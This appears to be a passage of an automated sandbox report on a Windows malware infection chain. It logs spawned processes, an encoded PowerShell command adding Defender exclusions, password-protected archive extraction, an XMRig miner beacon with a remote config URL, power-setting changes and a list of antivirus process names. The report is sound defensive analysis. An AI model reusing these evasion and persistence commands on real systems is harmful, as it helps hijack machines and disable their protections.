                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe "C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADEANQA3ADgAMQAwADAAMQBcAHMAVQBTAEYASgBqAFkALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEkAcwBTAHQAbwBwAHAAZQBkAC4AZQB4AGUAJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\explorer.exe explorer.exe
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_7.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_6.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_5.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextracted
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe"
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeProcess created: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe "C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe"
                            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\IsStopped.exe "C:\Users\user\AppData\Roaming\IsStopped.exe"
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeProcess created: unknown unknown
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwamqawadeanqa3adgamqawadaamqbcahmavqbtaeyasgbqafkalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwamqawadeanqa3adgamqawadaamqbcahmavqbtaeyasgbqafkalgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcaekacwbtahqabwbwahaazqbkac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcaekacwbtahqabwbwahaazqbkac4azqb4agua
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -enc qqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabhahqaaaagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwamqawadeanqa3adgamqawadaamqbcahmavqbtaeyasgbqafkalgblahgazqa7acaaqqbkagqalqbnahaauabyaguazgblahiazqbuagmazqagac0arqb4agmabab1ahmaaqbvag4auabyag8aywblahmacwagaemaogbcafuacwblahiacwbcagoabwbuaguacwbcaeeacabwaeqayqb0ageaxabmag8aywbhagwaxabuaguabqbwafwamqawadeanqa3adgamqawadaamqbcahmavqbtaeyasgbqafkalgblahgazqa7aeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaayqb0aggaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcaekacwbtahqabwbwahaazqbkac4azqb4aguaowagaeeazabkac0atqbwafaacgblagyazqbyaguabgbjaguaiaataeuaeabjagwadqbzagkabwbuafaacgbvagmazqbzahmaiabdadoaxabvahmazqbyahmaxabqag8abgblahmaxabbahaacabeageadabhafwaugbvageabqbpag4azwbcaekacwbtahqabwbwahaazqbkac4azqb4aguaJump to behavior
                            Source: explorer.exe, 00000017.00000003.2664467654.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager%
                            Source: explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager&
                            Source: file.exe, file.exe, 00000000.00000002.1771754017.00000000010FD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, skotes.exe, 00000001.00000002.1805877784.000000000093D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: o1Program Manager
                            Source: explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Windows\explorer.exe - Program Manager
                            Source: explorer.exe, 00000017.00000003.2640946465.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640900823.0000000000887000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerL
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":3,"type":"xmrig","status":1}
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":3,"type":"xmrig","status":1}7?
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {"id":"tjalvjhtgxjbffgq","computername":"120633","username":"user","gpu":"1YE2KOG","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":"C:\\Windows\\explorer.exe - Program Manager","runtime":3,"type":"xmrig","status":1}Zw
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 27_2_0098D690 cpuid 27_2_0098D690
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015821001\ae91ff4264.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015824001\6351911f1d.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015825001\65a8a64be3.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015826001\84d98ae8ad.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015827001\eb571902cc.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015828001\cf4367ad3a.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015829001\8d37f89c6f.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015830001\d0e065d272.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015831001\f5e7dd5dbb.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015831001\f5e7dd5dbb.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015832001\8fabf18f8e.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeQueries volume information: C:\Users\user\AppData\Roaming\IsStopped.exe VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
                            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDCBEA GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_00EDCBEA
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeCode function: 7_2_00402981 GetVersionExA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00402981
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Lowering of HIPS / PFW / Operating System Security Settings

                            barindex
                            Modifies power options to not sleep / hibernate
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bdagent.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avguard.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vsserv.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avp.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 360safe.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: msmpeng.exe
                            Source: explorer.exe, 00000017.00000003.2667541330.000000000085E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3848708673.000000000085F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2640244147.0000000000865000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ashdisp.exe
